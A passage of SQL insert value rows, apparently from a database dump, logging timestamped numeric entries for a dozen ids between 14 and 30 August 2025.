(19287, '2025-08-14 16:28:32', 1, 2062, 0, 1, 1),
(19288, '2025-08-14 16:29:00', 1, 2063, 0, 1, 1),
(19289, '2025-08-14 16:29:05', 1, 2061, 0, 1, 1),
(19290, '2025-08-14 16:29:41', 1, 2059, 0, 1, 1),
(19291, '2025-08-14 16:29:46', 1, 2058, 0, 1, 1),
(19292, '2025-08-14 16:29:51', 1, 2055, 0, 1, 1),
(19293, '2025-08-14 16:29:57', 1, 2054, 0, 1, 1),
(19294, '2025-08-14 16:30:03', 1, 2060, 0, 1, 1),
(19295, '2025-08-14 16:54:31', 1, 2058, 0, 1, 1),
(19296, '2025-08-14 18:33:55', 1, 2059, 0, 1, 1),
(19297, '2025-08-14 18:44:18', 1, 2064, 0, 1, 1),
(19298, '2025-08-14 18:44:41', 1, 2062, 0, 1, 1),
(19299, '2025-08-14 18:45:03', 1, 2063, 0, 1, 1),
(19300, '2025-08-14 18:45:12', 1, 2061, 0, 1, 1),
(19301, '2025-08-14 18:45:18', 1, 2059, 0, 1, 1),
(19302, '2025-08-14 18:45:27', 1, 2058, 0, 1, 1),
(19303, '2025-08-14 18:45:37', 1, 2055, 0, 1, 1),
(19304, '2025-08-14 18:45:42', 1, 2054, 0, 1, 1),
(19305, '2025-08-14 18:45:52', 1, 2060, 0, 1, 1),
(19306, '2025-08-14 18:52:19', 1, 2061, 0, 1, 1),
(19307, '2025-08-14 19:48:47', 1, 2064, 0, 1, 1),
(19308, '2025-08-14 22:04:35', 1, 2064, 0, 1, 1),
(19309, '2025-08-14 22:42:56', 1, 2064, 0, 1, 1),
(19310, '2025-08-14 22:43:21', 1, 2062, 0, 1, 1),
(19311, '2025-08-14 22:43:49', 1, 2063, 0, 1, 1),
(19312, '2025-08-14 22:43:56', 1, 2061, 0, 1, 1),
(19313, '2025-08-14 22:44:07', 1, 2059, 0, 1, 1),
(19314, '2025-08-14 22:44:15', 1, 2058, 0, 1, 1),
(19315, '2025-08-14 22:44:25', 1, 2055, 0, 1, 1),
(19316, '2025-08-14 22:44:33', 1, 2054, 0, 1, 1),
(19317, '2025-08-14 22:44:43', 1, 2060, 0, 1, 1),
(19318, '2025-08-14 23:43:48', 1, 2060, 0, 1, 1),
(19319, '2025-08-15 01:38:47', 1, 2053, 0, 1, 1),
(19320, '2025-08-15 04:17:18', 1, 2061, 0, 1, 1),
(19321, '2025-08-15 08:49:36', 1, 2064, 0, 1, 1),
(19322, '2025-08-15 08:50:07', 1, 2062, 0, 1, 1),
(19323, '2025-08-15 08:50:26', 1, 2063, 0, 1, 1),
(19324, '2025-08-15 08:50:33', 1, 2061, 0, 1, 1),
(19325, '2025-08-15 08:50:41', 1, 2059, 0, 1, 1),
(19326, '2025-08-15 08:50:47', 1, 2058, 0, 1, 1),
(19327, '2025-08-15 08:50:52', 1, 2055, 0, 1, 1),
(19328, '2025-08-15 08:50:57', 1, 2054, 0, 1, 1),
(19329, '2025-08-15 08:51:05', 1, 2060, 0, 1, 1),
(19330, '2025-08-15 10:38:50', 1, 2053, 0, 1, 1),
(19331, '2025-08-15 10:40:46', 1, 2064, 0, 1, 1),
(19332, '2025-08-15 10:41:16', 1, 2062, 0, 1, 1),
(19333, '2025-08-15 10:41:29', 1, 2063, 0, 1, 1),
(19334, '2025-08-15 10:41:34', 1, 2061, 0, 1, 1),
(19335, '2025-08-15 10:41:39', 1, 2059, 0, 1, 1),
(19336, '2025-08-15 10:41:44', 1, 2058, 0, 1, 1),
(19337, '2025-08-15 10:41:48', 1, 2055, 0, 1, 1),
(19338, '2025-08-15 10:41:58', 1, 2054, 0, 1, 1),
(19339, '2025-08-15 10:42:03', 1, 2060, 0, 1, 1),
(19340, '2025-08-15 12:03:24', 1, 2064, 0, 1, 1),
(19341, '2025-08-15 12:03:44', 1, 2062, 0, 1, 1),
(19342, '2025-08-15 12:04:15', 1, 2063, 0, 1, 1),
(19343, '2025-08-15 12:04:28', 1, 2061, 0, 1, 1),
(19344, '2025-08-15 12:04:33', 1, 2059, 0, 1, 1),
(19345, '2025-08-15 12:04:41', 1, 2058, 0, 1, 1),
(19346, '2025-08-15 12:04:52', 1, 2055, 0, 1, 1),
(19347, '2025-08-15 12:05:03', 1, 2054, 0, 1, 1),
(19348, '2025-08-15 12:05:17', 1, 2060, 0, 1, 1),
(19349, '2025-08-15 13:18:34', 1, 2055, 0, 1, 1),
(19350, '2025-08-15 14:24:43', 1, 2062, 0, 1, 1),
(19351, '2025-08-15 14:43:26', 1, 2060, 0, 1, 1),
(19352, '2025-08-15 14:50:00', 1, 2063, 0, 1, 1),
(19353, '2025-08-15 15:06:31', 1, 2058, 0, 1, 1),
(19354, '2025-08-15 15:29:10', 1, 2061, 0, 1, 1),
(19355, '2025-08-15 15:30:42', 1, 2060, 0, 1, 1),
(19356, '2025-08-15 15:37:30', 1, 2063, 0, 1, 1),
(19357, '2025-08-15 15:55:29', 1, 2058, 0, 1, 1),
(19358, '2025-08-15 15:58:37', 1, 2061, 0, 1, 1),
(19359, '2025-08-15 16:01:39', 1, 2054, 0, 1, 1),
(19360, '2025-08-15 16:23:17', 1, 2061, 0, 1, 1),
(19361, '2025-08-15 16:27:56', 1, 2055, 0, 1, 1),
(19362, '2025-08-15 16:52:44', 1, 2060, 0, 1, 1),
(19363, '2025-08-15 16:59:08', 1, 2061, 0, 1, 1),
(19364, '2025-08-15 16:59:39', 1, 2063, 0, 1, 1),
(19365, '2025-08-15 17:05:27', 1, 2061, 0, 1, 1),
(19366, '2025-08-15 17:37:13', 1, 2060, 0, 1, 1),
(19367, '2025-08-15 17:37:32', 1, 2061, 0, 1, 1),
(19368, '2025-08-15 17:39:04', 1, 2055, 0, 1, 1),
(19369, '2025-08-15 17:43:31', 1, 2063, 0, 1, 1),
(19370, '2025-08-15 17:59:49', 1, 2058, 0, 1, 1),
(19371, '2025-08-15 18:00:44', 1, 2061, 0, 1, 1),
(19372, '2025-08-15 18:09:40', 1, 2061, 0, 1, 1),
(19373, '2025-08-15 18:28:40', 1, 2055, 0, 1, 1),
(19374, '2025-08-15 18:48:37', 1, 2061, 0, 1, 1),
(19375, '2025-08-15 19:23:03', 1, 2064, 0, 1, 1),
(19376, '2025-08-15 19:23:30', 1, 2062, 0, 1, 1),
(19377, '2025-08-15 19:23:43', 1, 2061, 0, 1, 1),
(19378, '2025-08-15 19:24:21', 1, 2063, 0, 1, 1),
(19379, '2025-08-15 19:24:28', 1, 2061, 0, 1, 1),
(19380, '2025-08-15 19:24:35', 1, 2059, 0, 1, 1),
(19381, '2025-08-15 19:24:42', 1, 2058, 0, 1, 1),
(19382, '2025-08-15 19:24:48', 1, 2055, 0, 1, 1),
(19383, '2025-08-15 19:24:55', 1, 2054, 0, 1, 1),
(19384, '2025-08-15 19:25:02', 1, 2060, 0, 1, 1),
(19385, '2025-08-15 19:32:40', 1, 2061, 0, 1, 1),
(19386, '2025-08-15 19:57:57', 1, 2062, 0, 1, 1),
(19387, '2025-08-15 20:53:40', 1, 2061, 0, 1, 1),
(19388, '2025-08-15 20:57:58', 1, 2058, 0, 1, 1),
(19389, '2025-08-15 21:12:52', 1, 2054, 0, 1, 1),
(19390, '2025-08-15 21:29:20', 1, 2059, 0, 1, 1),
(19391, '2025-08-15 21:43:20', 1, 2064, 0, 1, 1),
(19392, '2025-08-15 22:29:55', 1, 2063, 0, 1, 1),
(19393, '2025-08-15 22:49:24', 1, 2063, 0, 1, 1),
(19394, '2025-08-15 22:49:28', 1, 2062, 0, 1, 1),
(19395, '2025-08-15 22:49:36', 1, 2061, 0, 1, 1),
(19396, '2025-08-15 23:20:10', 1, 2063, 0, 1, 1),
(19397, '2025-08-15 23:46:28', 1, 2061, 0, 1, 1),
(19398, '2025-08-16 02:34:57', 1, 2061, 0, 1, 1),
(19399, '2025-08-16 04:37:29', 1, 2062, 0, 1, 1),
(19400, '2025-08-16 04:54:00', 1, 2060, 0, 1, 1),
(19401, '2025-08-16 05:34:06', 1, 2060, 0, 1, 1),
(19402, '2025-08-16 05:59:19', 1, 2063, 0, 1, 1),
(19403, '2025-08-16 06:12:03', 1, 2060, 0, 1, 1),
(19404, '2025-08-16 06:35:47', 1, 2061, 0, 1, 1),
(19405, '2025-08-16 06:37:41', 1, 2060, 0, 1, 1),
(19406, '2025-08-16 08:22:45', 1, 2061, 0, 1, 1),
(19407, '2025-08-16 08:23:15', 1, 2060, 0, 1, 1),
(19408, '2025-08-16 08:44:05', 1, 2061, 0, 1, 1),
(19409, '2025-08-16 09:29:59', 1, 2061, 0, 1, 1),
(19410, '2025-08-16 10:26:07', 1, 2061, 0, 1, 1),
(19411, '2025-08-16 13:19:35', 1, 2061, 0, 1, 1),
(19412, '2025-08-16 13:55:38', 1, 2062, 0, 1, 1),
(19413, '2025-08-16 14:35:52', 1, 2062, 0, 1, 1),
(19414, '2025-08-16 14:42:39', 1, 2061, 0, 1, 1),
(19415, '2025-08-16 15:31:06', 1, 2053, 0, 1, 1),
(19416, '2025-08-16 17:57:54', 1, 2064, 0, 1, 1),
(19417, '2025-08-16 18:11:00', 1, 2059, 0, 1, 1),
(19418, '2025-08-16 18:37:22', 1, 2061, 0, 1, 1),
(19419, '2025-08-16 18:39:23', 1, 2058, 0, 1, 1),
(19420, '2025-08-16 18:50:13', 1, 2055, 0, 1, 1),
(19421, '2025-08-16 20:00:45', 1, 2053, 0, 1, 1),
(19422, '2025-08-16 20:14:42', 1, 2064, 0, 1, 1),
(19423, '2025-08-16 22:07:44', 1, 2054, 0, 1, 1),
(19424, '2025-08-16 22:29:54', 1, 2063, 0, 1, 1),
(19425, '2025-08-16 22:41:09', 1, 2061, 0, 1, 1),
(19426, '2025-08-16 23:00:56', 1, 2060, 0, 1, 1),
(19427, '2025-08-16 23:33:33', 1, 2058, 0, 1, 1),
(19428, '2025-08-17 01:47:15', 1, 2060, 0, 1, 1),
(19429, '2025-08-17 02:08:40', 1, 2063, 0, 1, 1),
(19430, '2025-08-17 02:20:23', 1, 2058, 0, 1, 1),
(19431, '2025-08-17 02:32:13', 1, 2062, 0, 1, 1),
(19432, '2025-08-17 02:34:05', 1, 2054, 0, 1, 1),
(19433, '2025-08-17 02:35:01', 1, 2063, 0, 1, 1),
(19434, '2025-08-17 02:36:59', 1, 2059, 0, 1, 1),
(19435, '2025-08-17 02:55:54', 1, 2054, 0, 1, 1),
(19436, '2025-08-17 03:02:25', 1, 2062, 0, 1, 1),
(19437, '2025-08-17 03:16:13', 1, 2060, 0, 1, 1),
(19438, '2025-08-17 04:01:58', 1, 2053, 0, 1, 1),
(19439, '2025-08-17 04:41:36', 1, 2053, 0, 1, 1),
(19440, '2025-08-17 06:29:51', 1, 2061, 0, 1, 1),
(19441, '2025-08-17 06:31:28', 1, 2053, 0, 1, 1),
(19442, '2025-08-17 06:53:58', 1, 2061, 0, 1, 1),
(19443, '2025-08-17 07:36:48', 1, 2053, 0, 1, 1),
(19444, '2025-08-17 07:53:11', 1, 2063, 0, 1, 1),
(19445, '2025-08-17 10:38:48', 1, 2064, 0, 1, 1),
(19446, '2025-08-17 10:46:42', 1, 2064, 0, 1, 1),
(19447, '2025-08-17 10:49:06', 1, 2061, 0, 1, 1),
(19448, '2025-08-17 10:50:54', 1, 2062, 0, 1, 1),
(19449, '2025-08-17 10:54:58', 1, 2063, 0, 1, 1),
(19450, '2025-08-17 10:57:07', 1, 2059, 0, 1, 1),
(19451, '2025-08-17 11:33:56', 1, 2062, 0, 1, 1),
(19452, '2025-08-17 11:43:10', 1, 2053, 0, 1, 1),
(19453, '2025-08-17 13:26:18', 1, 2061, 0, 1, 1),
(19454, '2025-08-17 14:54:17', 1, 2062, 0, 1, 1),
(19455, '2025-08-17 16:17:14', 1, 2059, 0, 1, 1),
(19456, '2025-08-17 17:16:43', 1, 2053, 0, 1, 1),
(19457, '2025-08-17 19:08:55', 1, 2061, 0, 1, 1),
(19458, '2025-08-17 19:36:42', 1, 2054, 0, 1, 1),
(19459, '2025-08-17 20:29:03', 1, 2053, 0, 1, 1),
(19460, '2025-08-17 22:12:19', 1, 2061, 0, 1, 1),
(19461, '2025-08-17 23:06:13', 1, 2053, 0, 1, 1),
(19462, '2025-08-18 00:05:03', 1, 2053, 0, 1, 1),
(19463, '2025-08-18 00:41:09', 1, 2061, 0, 1, 1),
(19464, '2025-08-18 02:34:02', 1, 2060, 0, 1, 1),
(19465, '2025-08-18 03:20:29', 1, 2061, 0, 1, 1),
(19466, '2025-08-18 04:46:34', 1, 2061, 0, 1, 1),
(19467, '2025-08-18 04:52:28', 1, 2064, 0, 1, 1),
(19468, '2025-08-18 05:26:35', 1, 2061, 0, 1, 1),
(19469, '2025-08-18 06:34:05', 1, 2060, 0, 1, 1),
(19470, '2025-08-18 06:34:08', 1, 2059, 0, 1, 1),
(19471, '2025-08-18 08:07:45', 1, 2061, 0, 1, 1),
(19472, '2025-08-18 09:44:54', 1, 2061, 0, 1, 1),
(19473, '2025-08-18 09:59:13', 1, 2061, 0, 1, 1),
(19474, '2025-08-18 10:17:25', 1, 2061, 0, 1, 1),
(19475, '2025-08-18 11:23:48', 1, 2061, 0, 1, 1),
(19476, '2025-08-18 11:55:44', 1, 2055, 0, 1, 1),
(19477, '2025-08-18 12:23:41', 1, 2061, 0, 1, 1),
(19478, '2025-08-18 13:23:41', 1, 2061, 0, 1, 1),
(19479, '2025-08-18 16:06:04', 1, 2062, 0, 1, 1),
(19480, '2025-08-18 16:25:26', 1, 2061, 0, 1, 1),
(19481, '2025-08-18 19:55:14', 1, 2059, 0, 1, 1),
(19482, '2025-08-18 21:48:22', 1, 2054, 0, 1, 1),
(19483, '2025-08-18 23:55:58', 1, 2063, 0, 1, 1),
(19484, '2025-08-19 00:42:47', 1, 2059, 0, 1, 1),
(19485, '2025-08-19 02:45:09', 1, 2060, 0, 1, 1),
(19486, '2025-08-19 03:43:13', 1, 2053, 0, 1, 1),
(19487, '2025-08-19 08:51:28', 1, 2058, 0, 1, 1),
(19488, '2025-08-19 09:16:02', 1, 2064, 0, 1, 1),
(19489, '2025-08-19 11:52:59', 1, 2054, 0, 1, 1),
(19490, '2025-08-19 12:02:25', 1, 2060, 0, 1, 1),
(19491, '2025-08-19 13:52:01', 1, 2058, 0, 1, 1),
(19492, '2025-08-19 14:28:24', 1, 2055, 0, 1, 1),
(19493, '2025-08-19 16:55:15', 1, 2053, 0, 1, 1),
(19494, '2025-08-19 16:59:19', 1, 2059, 0, 1, 1),
(19495, '2025-08-19 17:20:38', 1, 2062, 0, 1, 1),
(19496, '2025-08-19 19:30:37', 1, 2064, 0, 1, 1),
(19497, '2025-08-19 19:39:34', 1, 2058, 0, 1, 1),
(19498, '2025-08-19 19:39:42', 1, 2054, 0, 1, 1),
(19499, '2025-08-19 21:26:45', 1, 2059, 0, 1, 1),
(19500, '2025-08-19 21:34:52', 1, 2060, 0, 1, 1),
(19501, '2025-08-19 21:38:54', 1, 2061, 0, 1, 1),
(19502, '2025-08-19 21:38:55', 1, 2062, 0, 1, 1),
(19503, '2025-08-19 21:41:24', 1, 2058, 0, 1, 1),
(19504, '2025-08-19 21:41:42', 1, 2059, 0, 1, 1),
(19505, '2025-08-19 22:46:32', 1, 2061, 0, 1, 1),
(19506, '2025-08-19 23:40:07', 1, 2054, 0, 1, 1),
(19507, '2025-08-19 23:58:05', 1, 2060, 0, 1, 1),
(19508, '2025-08-20 00:27:34', 1, 2063, 0, 1, 1),
(19509, '2025-08-20 00:43:33', 1, 2053, 0, 1, 1),
(19510, '2025-08-20 02:38:44', 1, 2063, 0, 1, 1),
(19511, '2025-08-20 05:17:40', 1, 2060, 0, 1, 1),
(19512, '2025-08-20 07:02:17', 3, 2061, 3450, 1, 1),
(19513, '2025-08-20 07:03:49', 1, 2061, 0, 1, 1),
(19514, '2025-08-20 08:45:21', 1, 2055, 0, 1, 1),
(19515, '2025-08-20 12:43:01', 1, 2053, 0, 1, 1),
(19516, '2025-08-20 13:40:06', 1, 2060, 0, 1, 1),
(19517, '2025-08-20 13:47:36', 1, 2064, 0, 1, 1),
(19518, '2025-08-20 13:52:30', 1, 2063, 0, 1, 1),
(19519, '2025-08-20 14:25:50', 1, 2064, 0, 1, 1),
(19520, '2025-08-20 14:36:22', 1, 2054, 0, 1, 1),
(19521, '2025-08-20 15:23:47', 1, 2062, 0, 1, 1),
(19522, '2025-08-20 16:19:25', 1, 2061, 0, 1, 1),
(19523, '2025-08-20 19:37:45', 1, 2053, 0, 1, 1),
(19524, '2025-08-20 19:41:10', 1, 2053, 0, 1, 1),
(19525, '2025-08-20 19:52:17', 1, 2064, 0, 1, 1),
(19526, '2025-08-21 03:16:07', 1, 2062, 0, 1, 1),
(19527, '2025-08-21 04:55:52', 1, 2060, 0, 1, 1),
(19528, '2025-08-21 05:52:49', 1, 2059, 0, 1, 1),
(19529, '2025-08-21 06:55:53', 1, 2053, 0, 1, 1),
(19530, '2025-08-21 08:10:37', 1, 2061, 0, 1, 1),
(19531, '2025-08-21 09:55:49', 1, 2055, 0, 1, 1),
(19532, '2025-08-21 11:49:03', 1, 2061, 0, 1, 1),
(19533, '2025-08-21 13:57:43', 1, 2058, 0, 1, 1),
(19534, '2025-08-21 15:35:20', 1, 2062, 0, 1, 1),
(19535, '2025-08-21 15:47:00', 1, 2053, 0, 1, 1),
(19536, '2025-08-21 16:23:51', 1, 2058, 0, 1, 1),
(19537, '2025-08-21 16:55:15', 1, 2064, 0, 1, 1),
(19538, '2025-08-21 17:04:13', 1, 2063, 0, 1, 1),
(19539, '2025-08-21 17:35:03', 1, 2059, 0, 1, 1),
(19540, '2025-08-21 17:55:28', 1, 2064, 0, 1, 1),
(19541, '2025-08-21 18:14:19', 1, 2064, 0, 1, 1),
(19542, '2025-08-21 18:54:48', 1, 2059, 0, 1, 1),
(19543, '2025-08-22 01:11:34', 1, 2060, 0, 1, 1),
(19544, '2025-08-22 01:18:29', 1, 2061, 0, 1, 1),
(19545, '2025-08-22 01:31:06', 1, 2058, 0, 1, 1),
(19546, '2025-08-22 01:39:31', 1, 2055, 0, 1, 1),
(19547, '2025-08-22 01:47:23', 1, 2054, 0, 1, 1),
(19548, '2025-08-22 01:55:15', 1, 2053, 0, 1, 1),
(19549, '2025-08-22 02:18:06', 1, 2061, 0, 1, 1),
(19550, '2025-08-22 02:49:51', 1, 2054, 0, 1, 1),
(19551, '2025-08-22 03:00:06', 1, 2058, 0, 1, 1),
(19552, '2025-08-22 04:28:24', 1, 2060, 0, 1, 1),
(19553, '2025-08-22 04:30:03', 1, 2059, 0, 1, 1),
(19554, '2025-08-22 05:32:28', 1, 2061, 0, 1, 1),
(19555, '2025-08-22 05:44:52', 1, 2055, 0, 1, 1),
(19556, '2025-08-22 05:44:55', 1, 2064, 0, 1, 1),
(19557, '2025-08-22 05:44:59', 1, 2061, 0, 1, 1),
(19558, '2025-08-22 05:45:01', 1, 2058, 0, 1, 1),
(19559, '2025-08-22 07:17:08', 1, 2055, 0, 1, 1),
(19560, '2025-08-22 09:24:04', 1, 2062, 0, 1, 1),
(19561, '2025-08-22 10:13:57', 1, 2061, 0, 1, 1),
(19562, '2025-08-22 10:33:46', 1, 2060, 0, 1, 1),
(19563, '2025-08-22 11:05:01', 1, 2064, 0, 1, 1),
(19564, '2025-08-22 13:43:01', 1, 2063, 0, 1, 1),
(19565, '2025-08-22 13:48:25', 1, 2058, 0, 1, 1),
(19566, '2025-08-22 13:54:56', 1, 2055, 0, 1, 1),
(19567, '2025-08-22 14:12:33', 1, 2060, 0, 1, 1),
(19568, '2025-08-22 15:05:55', 1, 2060, 0, 1, 1),
(19569, '2025-08-22 15:25:01', 1, 2062, 0, 1, 1),
(19570, '2025-08-22 15:25:06', 1, 2062, 0, 1, 1),
(19571, '2025-08-22 16:04:46', 1, 2063, 0, 1, 1),
(19572, '2025-08-22 21:39:30', 1, 2064, 0, 1, 1),
(19573, '2025-08-22 22:54:55', 1, 2063, 0, 1, 1),
(19574, '2025-08-22 22:54:58', 1, 2062, 0, 1, 1),
(19575, '2025-08-22 22:55:08', 1, 2061, 0, 1, 1),
(19576, '2025-08-22 23:30:36', 1, 2061, 0, 1, 1),
(19577, '2025-08-23 00:38:52', 1, 2054, 0, 1, 1),
(19578, '2025-08-23 02:29:33', 1, 2060, 0, 1, 1),
(19579, '2025-08-23 03:10:07', 1, 2053, 0, 1, 1),
(19580, '2025-08-23 06:11:54', 1, 2053, 0, 1, 1),
(19581, '2025-08-23 10:39:46', 1, 2063, 0, 1, 1),
(19582, '2025-08-23 13:40:57', 1, 2061, 0, 1, 1),
(19583, '2025-08-23 15:36:56', 1, 2062, 0, 1, 1),
(19584, '2025-08-23 17:31:17', 1, 2061, 0, 1, 1),
(19585, '2025-08-24 05:07:48', 1, 2064, 0, 1, 1),
(19586, '2025-08-24 07:15:57', 1, 2060, 0, 1, 1),
(19587, '2025-08-24 07:16:03', 1, 2059, 0, 1, 1),
(19588, '2025-08-24 07:58:37', 1, 2061, 0, 1, 1),
(19589, '2025-08-24 10:00:27', 1, 2063, 0, 1, 1),
(19590, '2025-08-24 11:01:25', 1, 2064, 0, 1, 1),
(19591, '2025-08-24 12:20:40', 1, 2055, 0, 1, 1),
(19592, '2025-08-24 16:15:33', 1, 2062, 0, 1, 1),
(19593, '2025-08-24 19:48:36', 1, 2053, 0, 1, 1),
(19594, '2025-08-24 21:46:37', 1, 2064, 0, 1, 1),
(19595, '2025-08-25 01:49:11', 1, 2061, 0, 1, 1),
(19596, '2025-08-25 03:50:07', 1, 2062, 0, 1, 1),
(19597, '2025-08-25 04:45:55', 1, 2060, 0, 1, 1),
(19598, '2025-08-25 06:43:31', 1, 2060, 0, 1, 1),
(19599, '2025-08-25 10:33:18', 1, 2062, 0, 1, 1),
(19600, '2025-08-25 12:23:45', 1, 2053, 0, 1, 1),
(19601, '2025-08-25 13:26:16', 1, 2062, 0, 1, 1),
(19602, '2025-08-25 16:15:45', 1, 2062, 0, 1, 1),
(19603, '2025-08-25 18:48:13', 1, 2059, 0, 1, 1),
(19604, '2025-08-25 19:24:22', 1, 2064, 0, 1, 1),
(19605, '2025-08-25 19:33:34', 1, 2060, 0, 1, 1),
(19606, '2025-08-25 21:48:37', 1, 2054, 0, 1, 1),
(19607, '2025-08-26 07:40:45', 1, 2064, 0, 1, 1),
(19608, '2025-08-26 08:41:37', 1, 2058, 0, 1, 1),
(19609, '2025-08-26 13:50:10', 1, 2062, 0, 1, 1),
(19610, '2025-08-26 14:54:56', 1, 2055, 0, 1, 1),
(19611, '2025-08-26 16:18:36', 1, 2061, 0, 1, 1),
(19612, '2025-08-26 16:28:54', 1, 2058, 0, 1, 1),
(19613, '2025-08-26 16:34:37', 1, 2061, 0, 1, 1),
(19614, '2025-08-26 16:38:20', 1, 2055, 0, 1, 1),
(19615, '2025-08-26 16:49:46', 1, 2054, 0, 1, 1),
(19616, '2025-08-26 17:09:00', 1, 2064, 0, 1, 1),
(19617, '2025-08-26 17:11:29', 1, 2053, 0, 1, 1),
(19618, '2025-08-26 18:15:41', 1, 2060, 0, 1, 1),
(19619, '2025-08-26 19:10:57', 1, 2054, 0, 1, 1),
(19620, '2025-08-26 19:52:33', 1, 2058, 0, 1, 1),
(19621, '2025-08-26 19:52:41', 1, 2054, 0, 1, 1),
(19622, '2025-08-27 01:07:30', 1, 2059, 0, 1, 1),
(19623, '2025-08-27 01:25:57', 1, 2059, 0, 1, 1),
(19624, '2025-08-27 01:27:24', 1, 2063, 0, 1, 1),
(19625, '2025-08-27 01:27:34', 1, 2064, 0, 1, 1),
(19626, '2025-08-27 01:27:54', 1, 2062, 0, 1, 1),
(19627, '2025-08-27 01:28:52', 1, 2061, 0, 1, 1),
(19628, '2025-08-27 01:31:40', 1, 2054, 0, 1, 1),
(19629, '2025-08-27 01:43:13', 1, 2058, 0, 1, 1),
(19630, '2025-08-27 01:56:05', 1, 2064, 0, 1, 1),
(19631, '2025-08-27 02:06:59', 1, 2053, 0, 1, 1),
(19632, '2025-08-27 02:09:06', 1, 2063, 0, 1, 1),
(19633, '2025-08-27 02:10:13', 1, 2055, 0, 1, 1),
(19634, '2025-08-27 02:27:39', 1, 2062, 0, 1, 1),
(19635, '2025-08-27 02:36:26', 1, 2059, 0, 1, 1),
(19636, '2025-08-27 02:56:53', 1, 2063, 0, 1, 1),
(19637, '2025-08-27 03:25:02', 1, 2062, 0, 1, 1),
(19638, '2025-08-27 03:43:15', 1, 2060, 0, 1, 1),
(19639, '2025-08-27 06:40:47', 1, 2053, 0, 1, 1),
(19640, '2025-08-27 06:58:26', 1, 2064, 0, 1, 1),
(19641, '2025-08-27 07:16:55', 1, 2053, 0, 1, 1),
(19642, '2025-08-27 07:43:10', 1, 2061, 0, 1, 1),
(19643, '2025-08-27 09:16:59', 1, 2060, 0, 1, 1),
(19644, '2025-08-27 09:51:05', 1, 2060, 0, 1, 1),
(19645, '2025-08-27 12:54:10', 1, 2060, 0, 1, 1),
(19646, '2025-08-27 13:27:25', 1, 2062, 0, 1, 1),
(19647, '2025-08-27 14:31:41', 1, 2060, 0, 1, 1),
(19648, '2025-08-27 16:39:39', 1, 2062, 0, 1, 1),
(19649, '2025-08-27 16:43:24', 1, 2058, 0, 1, 1),
(19650, '2025-08-27 16:47:44', 1, 2055, 0, 1, 1),
(19651, '2025-08-27 16:55:19', 1, 2060, 0, 1, 1),
(19652, '2025-08-27 19:54:50', 1, 2060, 0, 1, 1),
(19653, '2025-08-27 20:01:26', 1, 2063, 0, 1, 1),
(19654, '2025-08-27 20:23:00', 1, 2060, 0, 1, 1),
(19655, '2025-08-27 20:29:16', 1, 2063, 0, 1, 1),
(19656, '2025-08-27 20:46:53', 1, 2058, 0, 1, 1),
(19657, '2025-08-27 20:55:36', 1, 2061, 0, 1, 1),
(19658, '2025-08-27 20:55:53', 1, 2060, 0, 1, 1),
(19659, '2025-08-27 21:21:10', 1, 2055, 0, 1, 1),
(19660, '2025-08-27 22:11:25', 1, 2059, 0, 1, 1),
(19661, '2025-08-27 22:21:54', 1, 2061, 0, 1, 1),
(19662, '2025-08-27 22:51:17', 1, 2059, 0, 1, 1),
(19663, '2025-08-27 22:54:35', 1, 2062, 0, 1, 1),
(19664, '2025-08-27 23:52:53', 1, 2054, 0, 1, 1),
(19665, '2025-08-28 00:05:23', 1, 2059, 0, 1, 1),
(19666, '2025-08-28 00:15:58', 1, 2064, 0, 1, 1),
(19667, '2025-08-28 00:52:23', 1, 2060, 0, 1, 1),
(19668, '2025-08-28 00:59:23', 1, 2063, 0, 1, 1),
(19669, '2025-08-28 01:19:15', 1, 2058, 0, 1, 1),
(19670, '2025-08-28 01:58:21', 1, 2055, 0, 1, 1),
(19671, '2025-08-28 02:58:13', 1, 2061, 0, 1, 1),
(19672, '2025-08-28 03:29:42', 1, 2062, 0, 1, 1),
(19673, '2025-08-28 04:27:06', 1, 2054, 0, 1, 1),
(19674, '2025-08-28 04:39:20', 1, 2059, 0, 1, 1),
(19675, '2025-08-28 04:49:37', 1, 2064, 0, 1, 1),
(19676, '2025-08-28 04:54:43', 1, 2062, 0, 1, 1),
(19677, '2025-08-28 05:57:25', 1, 2058, 0, 1, 1),
(19678, '2025-08-28 06:09:25', 1, 2064, 0, 1, 1),
(19679, '2025-08-28 07:01:26', 1, 2062, 0, 1, 1),
(19680, '2025-08-28 07:10:06', 1, 2064, 0, 1, 1),
(19681, '2025-08-28 08:10:06', 1, 2058, 0, 1, 1),
(19682, '2025-08-28 08:50:06', 1, 2063, 0, 1, 1),
(19683, '2025-08-28 14:00:30', 1, 2062, 0, 1, 1),
(19684, '2025-08-28 16:27:43', 1, 2063, 0, 1, 1),
(19685, '2025-08-28 18:16:13', 1, 2059, 0, 1, 1),
(19686, '2025-08-28 22:12:51', 1, 2054, 0, 1, 1),
(19687, '2025-08-28 23:22:13', 1, 2053, 0, 1, 1),
(19688, '2025-08-29 01:53:13', 1, 2053, 0, 1, 1),
(19689, '2025-08-29 02:29:55', 1, 2061, 0, 1, 1),
(19690, '2025-08-29 03:24:55', 1, 2060, 0, 1, 1),
(19691, '2025-08-29 05:43:53', 1, 2060, 0, 1, 1),
(19692, '2025-08-29 05:50:07', 1, 2061, 0, 1, 1),
(19693, '2025-08-29 07:54:51', 1, 2061, 0, 1, 1),
(19694, '2025-08-29 09:07:03', 1, 2053, 0, 1, 1),
(19695, '2025-08-29 10:11:25', 1, 2060, 0, 1, 1),
(19696, '2025-08-29 10:16:35', 1, 2060, 0, 1, 1),
(19697, '2025-08-29 10:31:19', 1, 2053, 0, 1, 1),
(19698, '2025-08-29 13:45:28', 1, 2062, 0, 1, 1),
(19699, '2025-08-29 17:00:17', 1, 2061, 0, 1, 1),
(19700, '2025-08-29 18:53:27', 1, 2053, 0, 1, 1),
(19701, '2025-08-29 22:44:31', 1, 2061, 0, 1, 1),
(19702, '2025-08-29 22:44:35', 1, 2063, 0, 1, 1),
(19703, '2025-08-29 22:44:39', 1, 2062, 0, 1, 1),
(19704, '2025-08-29 22:48:58', 1, 2063, 0, 1, 1),
(19705, '2025-08-29 23:38:35', 1, 2061, 0, 1, 1),
(19706, '2025-08-30 00:18:57', 1, 2060, 0, 1, 1),
(19707, '2025-08-30 04:57:30', 1, 2060, 0, 1, 1),
(19708, '2025-08-30 07:21:47', 1, 2059, 0, 1, 1),
(19709, '2025-08-30 08:14:43', 1, 2053, 0, 1, 1),
(19710, '2025-08-30 09:08:35', 1, 2053, 0, 1, 1),
(19711, '2025-08-30 14:06:54', 1, 2054, 0, 1, 1),
(19712, '2025-08-30 14:08:37', 1, 2063, 0, 1, 1),
(19713, '2025-08-30 14:13:56', 1, 2053, 0, 1, 1),
(19714, '2025-08-30 20:11:17', 1, 2061, 0, 1, 1),
